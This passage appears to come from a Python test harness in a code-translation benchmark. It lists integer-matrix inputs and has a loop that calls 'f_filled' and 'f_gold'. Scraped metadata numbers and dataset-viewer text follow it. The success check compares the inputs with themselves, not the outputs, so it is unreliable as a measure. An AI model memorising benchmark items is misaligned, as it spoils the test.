14, 15, 16, 19, 22, 24, 25, 25, 27, 32, 35, 38, 38, 39, 40, 41, 42, 44, 47, 50, 52, 54, 54, 55, 58, 64, 69, 73, 74, 74, 78, 79, 86, 89, 90, 91, 92, 99], [2, 2, 2, 3, 6, 6, 11, 12, 13, 14, 15, 17, 17, 19, 22, 24, 29, 33, 36, 42, 45, 45, 45, 46, 48, 49, 51, 51, 52, 52, 65, 67, 67, 69, 70, 72, 80, 81, 81, 86, 89, 89, 91, 92, 93, 93, 97], [2, 6, 7, 13, 15, 22, 22, 27, 27, 28, 32, 36, 36, 36, 39, 41, 43, 44, 44, 45, 47, 48, 51, 53, 55, 56, 59, 60, 61, 61, 61, 64, 67, 69, 69, 69, 69, 70, 74, 80, 83, 84, 87, 91, 92, 95, 98], [6, 7, 7, 11, 11, 12, 12, 16, 16, 19, 19, 21, 26, 26, 28, 35, 36, 37, 41, 41, 42, 45, 54, 54, 63, 65, 67, 67, 69, 76, 77, 78, 81, 83, 83, 84, 85, 85, 88, 90, 90, 91, 93, 94, 96, 97, 98]],37,28,34,),
([[-18, -42, 20, -30, 0, 30, 22, -64, 2, 74, 54, 34, -22, -34, -22, -46, 46, 70, 74, -62, -84, -96, -34, -26], [40, -94, -42, -84, 8, -8, 40, 24, 62, -18, -42, 22, 50, -72, 0, 86, 20, 74, -66, -34, 2, 72, 68, -44], [-32, -82, -4, 98, 54, -46, 84, 16, 76, 68, 86, -58, 58, 58, -92, -90, -68, 16, 94, -84, 26, 68, -64, 86], [-64, 58, 6, -46, -84, -96, 14, 24, -96, -58, -36, -26, 30, -48, 4, -96, 18, 80, 60, 98, 72, -20, 0, -46], [-70, 58, 50, -70, 16, -18, 62, -84, 44, -98, 42, -2, 78, 78, 46, 60, 34, -16, 4, -52, -40, 16, -32, -82], [74, 54, 74, 14, 16, 28, -94, 42, -66, 40, 90, 84, -90, 28, -98, 26, -70, -2, -56, 88, 72, -44, 58, 36], [30, -48, -16, -54, -96, -46, 6, -28, -62, 76, 6, -14, 70, 2, -46, -14, -38, 72, -10, 60, -68, 92, 26, -2], [-80, -34, 18, 4, -56, -78, 18, -14, 20, 38, 38, 10, 8, 8, 44, 30, 18, -48, -64, 60, 28, -24, -76, 90], [-44, 12, 40, -40, -72, -74, -18, -86, -96, -24, 22, -80, 28, 62, 16, -28, -34, -86, -88, 66, 24, 30, 4, 54], [20, 44, -2, 0, 52, 52, -24, -88, 4, 6, -94, 96, -44, -68, -64, 34, -18, 44, 76, -16, 64, 36, -98, -88], [-58, -38, 6, -96, 2, -30, -94, -76, -82, -16, -36, -52, 0, -66, 52, -84, 4, 84, -32, -32, -16, -46, -24, -58], [-62, -18, 14, 56, 58, 68, -32, -46, -86, 58, -86, 36, -82, -98, 28, -8, 46, 76, -24, -38, -76, 74, 84, -86], [-38, 76, -48, -54, 80, 36, -86, -64, 68, -72, -70, 14, 14, -72, 46, -54, -98, -66, 36, 12, -74, 84, 76, 98], [62, -38, -70, 86, 40, 82, -70, -54, -90, -26, 86, 4, -66, 36, 22, 54, -30, 44, -36, 68, 2, -8, 78, -46], [-26, -26, -96, 16, -10, 98, -58, 30, -42, 26, 32, -74, 8, -74, 44, 46, -82, 94, 6, 0, -82, 32, 88, 0], [88, 54, -90, 82, -28, -96, 62, 64, 24, 72, 80, -30, -78, 62, -16, -48, -70, 78, 88, -30, 44, -40, -78, -14], [-74, -78, -46, -2, -2, 28, -8, 72, -44, 86, -26, -14, 84, 26, 72, 30, -4, 72, 92, 24, 98, 98, -80, 10], [-54, 68, 86, -14, 54, 86, -60, 40, 18, -32, 34, 22, 14, -36, 92, -42, 34, 86, -8, 60, -14, 6, -68, -16], [30, 82, -14, -60, 48, 30, 32, -42, 52, 48, 72, 30, -22, 16, -28, 
-92, -66, -90, -80, 86, 52, 92, -10, 20], [82, -78, -86, -80, -96, 60, -96, -14, 24, -42, 6, 66, 84, -16, -80, -38, 38, -90, -34, 16, 26, 82, -20, -42], [-36, -28, 86, 20, 88, -16, -40, 30, -26, 24, 18, -42, 68, -72, -42, -54, -86, -14, -86, -16, -58, 88, 94, 74], [62, -88, -18, -50, -36, -66, 74, 88, 54, -36, -70, 48, -68, 64, 70, 60, 28, 88, -60, 18, -70, -20, 70, 24], [-70, -16, -74, -6, 60, 8, 80, -72, -96, 62, -34, 8, 62, 48, -20, -92, -82, 60, 58, 80, 40, -34, 48, -40], [-48, 42, 64, -36, 28, -46, -68, 16, -42, 16, -34, 6, 78, 52, 38, -84, 90, 4, -94, -56, -30, -72, -36, -28]],16,18,22,),
([[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]],19,26,34,),
([[37, 36, 46, 54, 59, 38, 5, 91, 97, 28, 88, 14, 71, 52, 71, 38, 62, 81, 19, 41, 19, 28, 42, 29, 19], [10, 82, 70, 27, 5, 9, 26, 78, 21, 71, 40, 27, 18, 75, 92, 49, 94, 39, 30, 12, 38, 13, 89, 19, 42], [23, 28, 28, 44, 55, 87, 49, 69, 37, 58, 6, 83, 75, 54, 80, 85, 62, 55, 2, 53, 75, 7, 65, 66, 16], [3, 84, 78, 20, 78, 29, 38, 84, 2, 24, 46, 84, 28, 34, 96, 14, 43, 13, 14, 63, 65, 35, 14, 12, 36], [78, 75, 60, 86, 45, 47, 55, 18, 55, 50, 99, 1, 85, 21, 6, 21, 76, 85, 55, 75, 97, 5, 70, 1, 59], [71, 65, 92, 91, 32, 85, 43, 5, 77, 47, 38, 76, 70, 67, 57, 16, 31, 74, 61, 51, 67, 47, 26, 80, 32], [29, 50, 99, 33, 47, 29, 34, 12, 53, 93, 63, 87, 76, 5, 95, 94, 6, 41, 8, 54, 25, 44, 53, 67, 31], [28, 55, 3, 82, 19, 68, 11, 87, 33, 99, 74, 71, 30, 45, 8, 92, 57, 14, 67, 83, 4, 14, 32, 98, 54], [73, 86, 44, 26, 40, 12, 73, 81, 24, 12, 68, 3, 88, 96, 59, 69, 70, 89, 34, 91, 23, 32, 25, 57, 97], [59, 2, 66, 32, 52, 39, 59, 31, 60, 36, 79, 94, 36, 69, 90, 50, 68, 45, 35, 48, 50, 91, 75, 48, 17], [27, 42, 95, 7, 3, 77, 3, 36, 73, 65, 43, 49, 87, 79, 87, 39, 33, 4, 75, 80, 48, 23, 52, 15, 4], [34, 98, 83, 15, 26, 65, 83, 18, 33, 90, 87, 98, 79, 36, 47, 26, 88, 42, 49, 73, 96, 84, 69, 73, 41], [30, 91, 12, 61, 1, 28, 66, 48, 58, 49, 82, 68, 31, 63, 42, 64, 72, 99, 66, 27, 93, 97, 98, 25, 83], [14, 66, 57, 58, 89, 54, 65, 94, 87, 90, 14, 91, 41, 87, 42, 73, 94, 46, 65, 21, 20, 76, 91, 11, 1], [54, 41, 37, 8, 21, 35, 29, 89, 9, 32, 90, 86, 22, 81, 57, 92, 85, 8, 3, 77, 16, 96, 73, 59, 36], [94, 25, 80, 39, 57, 56, 88, 46, 79, 74, 14, 85, 97, 17, 65, 26, 35, 80, 12, 2, 72, 84, 12, 28, 36], [7, 82, 61, 53, 20, 62, 56, 64, 93, 29, 28, 17, 34, 9, 99, 62, 55, 60, 94, 72, 3, 56, 38, 30, 68], [32, 37, 47, 37, 79, 34, 27, 92, 85, 42, 12, 41, 57, 88, 49, 93, 77, 64, 78, 89, 10, 31, 81, 3, 18], [73, 86, 76, 80, 29, 53, 23, 25, 97, 20, 49, 96, 12, 43, 41, 55, 83, 48, 24, 79, 51, 72, 72, 16, 44], [35, 69, 45, 71, 40, 46, 53, 15, 60, 58, 31, 77, 59, 70, 7, 37, 24, 7, 30, 90, 19, 34, 82, 58, 
61], [92, 8, 73, 52, 16, 68, 69, 12, 18, 55, 74, 52, 14, 75, 40, 89, 15, 68, 43, 10, 40, 38, 87, 83, 41], [70, 45, 63, 22, 59, 29, 56, 94, 20, 2, 58, 10, 13, 1, 95, 9, 92, 90, 77, 78, 17, 63, 76, 29, 66], [46, 33, 15, 28, 85, 88, 31, 95, 71, 91, 41, 16, 85, 14, 66, 18, 11, 21, 31, 12, 78, 61, 91, 80, 90], [35, 54, 35, 42, 80, 95, 91, 20, 64, 12, 91, 43, 87, 9, 38, 75, 16, 1, 2, 44, 70, 58, 73, 54, 46], [46, 43, 27, 4, 11, 51, 58, 70, 39, 63, 4, 17, 42, 52, 93, 51, 11, 78, 50, 34, 25, 46, 61, 14, 62]],20,18,19,)
]
n_success = 0
for i, parameters_set in enumerate(param):
f_filled(*(filled_function_param[i]))
f_gold(*parameters_set)
if parameters_set == filled_function_param[i]:
n_success+=1
print("#Results: %i, %i" % (n_success, len(param)))
| 961
| 8,723
| 0.430838
| 14,413
| 53,816
| 1.607091
| 0.010685
| 0.175107
| 0.2251
| 0.265596
| 0.981652
| 0.980616
| 0.980616
| 0.980616
| 0.980616
| 0.980616
| 0
| 0.579994
| 0.272354
| 53,816
| 56
| 8,724
| 961
| 0.011517
| 0.003438
| 0
| 0.521739
| 0
| 0
| 0.000448
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021739
| false
| 0
| 0
| 0
| 0.021739
| 0.043478
| 0
| 0
| 1
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.